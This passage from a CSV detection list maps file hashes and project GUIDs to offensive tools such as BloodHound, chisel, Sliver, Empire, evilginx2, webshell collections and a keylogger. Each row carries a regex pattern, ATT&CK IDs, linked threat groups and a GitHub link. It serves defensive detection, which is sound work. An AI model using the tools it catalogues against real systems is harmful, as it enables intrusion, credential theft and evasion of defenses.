"*8cb53c48c37fe2974dc0b8240610e8b85e0802c6b1cf075a4af4e29d80546e5f*",".{0,1000}8cb53c48c37fe2974dc0b8240610e8b85e0802c6b1cf075a4af4e29d80546e5f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30781"
"*8cb79a0a047793ff81319d7e4999732f8fcc49fbb2ba76f9ac38abf988c3eed8*",".{0,1000}8cb79a0a047793ff81319d7e4999732f8fcc49fbb2ba76f9ac38abf988c3eed8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30782"
"*8ccc989ac8dfc5453a486361a7850f1add7e2f7dfe4016840671e8c183ed887a*",".{0,1000}8ccc989ac8dfc5453a486361a7850f1add7e2f7dfe4016840671e8c183ed887a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30785"
"*8ccf0e4161a841745e5ef8c6a2e46c48420b7eb010aa2aa3468b014e981949a5*",".{0,1000}8ccf0e4161a841745e5ef8c6a2e46c48420b7eb010aa2aa3468b014e981949a5.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","30786"
"*8ccf6166988aeda295d01347726b682bff22950b5549d7276737d3084022b292*",".{0,1000}8ccf6166988aeda295d01347726b682bff22950b5549d7276737d3084022b292.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","30787"
"*8cd0ff4a46caae1508aaa14d69ac3393f05d2e58a1fd94d8c8b45a3ed6a6a474*",".{0,1000}8cd0ff4a46caae1508aaa14d69ac3393f05d2e58a1fd94d8c8b45a3ed6a6a474.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30788"
"*8cd2f14abea20f3b1d96f3d535670b7463c8efbd01729fa00abdf20ab69f2792*",".{0,1000}8cd2f14abea20f3b1d96f3d535670b7463c8efbd01729fa00abdf20ab69f2792.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30789"
"*8cda5ed686c75c07bd1e2bc6bd173c3ed48c1dc52dbde4c596d571ad1f1a92ba*",".{0,1000}8cda5ed686c75c07bd1e2bc6bd173c3ed48c1dc52dbde4c596d571ad1f1a92ba.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30791"
"*8ceab34777527464cf217e5cda5008365e1a5c1c2197000bda78f303353308ac*",".{0,1000}8ceab34777527464cf217e5cda5008365e1a5c1c2197000bda78f303353308ac.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30792"
"*8cfdfcb62203fc2bf0e80025b66cdb6606f02612dcadfd94328e481414dc570d*",".{0,1000}8cfdfcb62203fc2bf0e80025b66cdb6606f02612dcadfd94328e481414dc570d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30795"
"*8cOpc1mnZbcpRkvRwqE8jeEvQdxxO67SVM6GP8rLbDdePzAzLVTbI23DCQCaMIgo*",".{0,1000}8cOpc1mnZbcpRkvRwqE8jeEvQdxxO67SVM6GP8rLbDdePzAzLVTbI23DCQCaMIgo.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","30796"
"*8d013a3cd78fc557c13657fbdf62382cace60d05dc73868184db4a5573bca34e*",".{0,1000}8d013a3cd78fc557c13657fbdf62382cace60d05dc73868184db4a5573bca34e.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","#filehash","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","30797"
"*8d020f5a01e88c58f0ede5b1f58e63f30a170502c7a2817c86b1f97832cf515f*",".{0,1000}8d020f5a01e88c58f0ede5b1f58e63f30a170502c7a2817c86b1f97832cf515f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30798"
"*8d0cbb7280381d6847295ae41a30dd19afb7a27141b95918561e52dbcc458182*",".{0,1000}8d0cbb7280381d6847295ae41a30dd19afb7a27141b95918561e52dbcc458182.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30800"
"*8d0dac6d636eb3acfab0fd50442a8d404251266bcaf175eb4c119917e7ba32bc*",".{0,1000}8d0dac6d636eb3acfab0fd50442a8d404251266bcaf175eb4c119917e7ba32bc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30801"
"*8d134034c936cf5b4015e47577954294a97e4440eac5d32271ff7355f517475e*",".{0,1000}8d134034c936cf5b4015e47577954294a97e4440eac5d32271ff7355f517475e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30803"
"*8d192a48a06a7568284079c35ce1d16d4ec2d53319e4210b1138f87b7612edd9*",".{0,1000}8d192a48a06a7568284079c35ce1d16d4ec2d53319e4210b1138f87b7612edd9.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30805"
"*8d1f3e17106324aad99a98f5dd921db9d27a620b37cadc06a4c470f4404dfca2*",".{0,1000}8d1f3e17106324aad99a98f5dd921db9d27a620b37cadc06a4c470f4404dfca2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30806"
"*8d246f76d57dfa40f287d6d37f3a43c343b67c5db31f728d4568f2d8ed2d2799*",".{0,1000}8d246f76d57dfa40f287d6d37f3a43c343b67c5db31f728d4568f2d8ed2d2799.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30811"
"*8d2a5cc827299d47424631882399067acf41d040c5b2aacf95092aec22d90c97*",".{0,1000}8d2a5cc827299d47424631882399067acf41d040c5b2aacf95092aec22d90c97.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30812"
"*8d2b6767f4a99a2bf89c412dd27424aeaf9f79ccd0640ab1257168c895c85f36*",".{0,1000}8d2b6767f4a99a2bf89c412dd27424aeaf9f79ccd0640ab1257168c895c85f36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30813"
"*8d2bb3201ed9277b0e4ec42e1aa56ec10bf05bcfcc4ad966656c428ac556d2e5*",".{0,1000}8d2bb3201ed9277b0e4ec42e1aa56ec10bf05bcfcc4ad966656c428ac556d2e5.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30814"
"*8d3129341c603fa22b052f925fdf3bef054327c081299140d3c484f76254ca87*",".{0,1000}8d3129341c603fa22b052f925fdf3bef054327c081299140d3c484f76254ca87.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30816"
"*8d352347e622b8ff6babf1a119266f59c1b14a48cebc4cb2cf84c00edd276fe3*",".{0,1000}8d352347e622b8ff6babf1a119266f59c1b14a48cebc4cb2cf84c00edd276fe3.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#filehash","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","30817"
"*8d3754efe45f18834003648a1e59e39b36675476e47db1c4e105cbe49ecf6105*",".{0,1000}8d3754efe45f18834003648a1e59e39b36675476e47db1c4e105cbe49ecf6105.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30818"
"*8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3*",".{0,1000}8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","#filehash","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z","30819"
"*8d3af0da4c96ce9497da87a6264e081ee9119f6f82bd3923d01e40250690ab6a*",".{0,1000}8d3af0da4c96ce9497da87a6264e081ee9119f6f82bd3923d01e40250690ab6a.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30820"
"*8d43a02d409a31297b2d1a997dbeaeaf10f97f499e2da819eef1318c0df652e4*",".{0,1000}8d43a02d409a31297b2d1a997dbeaeaf10f97f499e2da819eef1318c0df652e4.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","30822"
"*8d525a86500b6ebf3618e9f9f5fd861cdf6a8318dba28acfa95a5c725239d015*",".{0,1000}8d525a86500b6ebf3618e9f9f5fd861cdf6a8318dba28acfa95a5c725239d015.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30823"
"*8d7640bff1eef0a194fd9fac25355169433b53f6cc34f3eb382bc47aa448bd19*",".{0,1000}8d7640bff1eef0a194fd9fac25355169433b53f6cc34f3eb382bc47aa448bd19.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30828"
"*8d7870f61a93a1466b02cad2cc5c036e1a7dc76753a6b90a38f41a6558c65146*",".{0,1000}8d7870f61a93a1466b02cad2cc5c036e1a7dc76753a6b90a38f41a6558c65146.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","30830"
"*8d792ce2918767066d9de241a7479094ff84a7234957840fda5381298be9af21*",".{0,1000}8d792ce2918767066d9de241a7479094ff84a7234957840fda5381298be9af21.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","30831"
"*8d7c4034043a81ba951f25cc46e7de09e10e29465a8891d9b98b25770cc48624*",".{0,1000}8d7c4034043a81ba951f25cc46e7de09e10e29465a8891d9b98b25770cc48624.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30833"
"*8d8504a63c64c3cd8cd265846b04aef38128987c88bc9ca46144f85741e1fd33*",".{0,1000}8d8504a63c64c3cd8cd265846b04aef38128987c88bc9ca46144f85741e1fd33.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","30835"
"*8d87231f69d0fdeb63b10141cba62e31cc0fb16a105fda66fbd77f06e9d98feb*",".{0,1000}8d87231f69d0fdeb63b10141cba62e31cc0fb16a105fda66fbd77f06e9d98feb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30836"
"*8D907846-455E-39A7-BD31-BC9F81468B47*",".{0,1000}8D907846\-455E\-39A7\-BD31\-BC9F81468B47.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","30837"
"*8D907846-455E-39A7-BD31-BC9F81468B47*",".{0,1000}8D907846\-455E\-39A7\-BD31\-BC9F81468B47.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","30838"
"*8d944f890478ade2c832a84892373f85b54a3903bce4d0fc34f07a396736b4a5*",".{0,1000}8d944f890478ade2c832a84892373f85b54a3903bce4d0fc34f07a396736b4a5.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30839"
"*8da1165d0f8bc514c82d5818ac89bb7a5e31d1f78258ac8beecb7b73fc5d857a*",".{0,1000}8da1165d0f8bc514c82d5818ac89bb7a5e31d1f78258ac8beecb7b73fc5d857a.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","30842"
"*8dac9832-d464-4916-b102-9efa913bdc44*",".{0,1000}8dac9832\-d464\-4916\-b102\-9efa913bdc44.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","30843"
"*8dacc97038a845b73c4f156f3fb4d00ef5b4cfa7a8e6b10e0bd8e5c918d62fd1*",".{0,1000}8dacc97038a845b73c4f156f3fb4d00ef5b4cfa7a8e6b10e0bd8e5c918d62fd1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30844"
"*8db1d4921a94819ac9222d02e9db1539d2fe613f0fe0459698f3daa3d56d934e*",".{0,1000}8db1d4921a94819ac9222d02e9db1539d2fe613f0fe0459698f3daa3d56d934e.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","30845"
"*8db6879b0c3f33cf027515fb91fa397a09f2989ef9660b3243901ae38f6ace3c*",".{0,1000}8db6879b0c3f33cf027515fb91fa397a09f2989ef9660b3243901ae38f6ace3c.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","30847"
"*8dbe2548630f7e261f208f203dcb96aa9bab12432a9e7c8ba49217f3268c4c24*",".{0,1000}8dbe2548630f7e261f208f203dcb96aa9bab12432a9e7c8ba49217f3268c4c24.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30848"
"*8dc950cda4cee750819dbb8c1f0b3dd2ba3e8a51679854517be8f619c8e2e736*",".{0,1000}8dc950cda4cee750819dbb8c1f0b3dd2ba3e8a51679854517be8f619c8e2e736.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","30852"
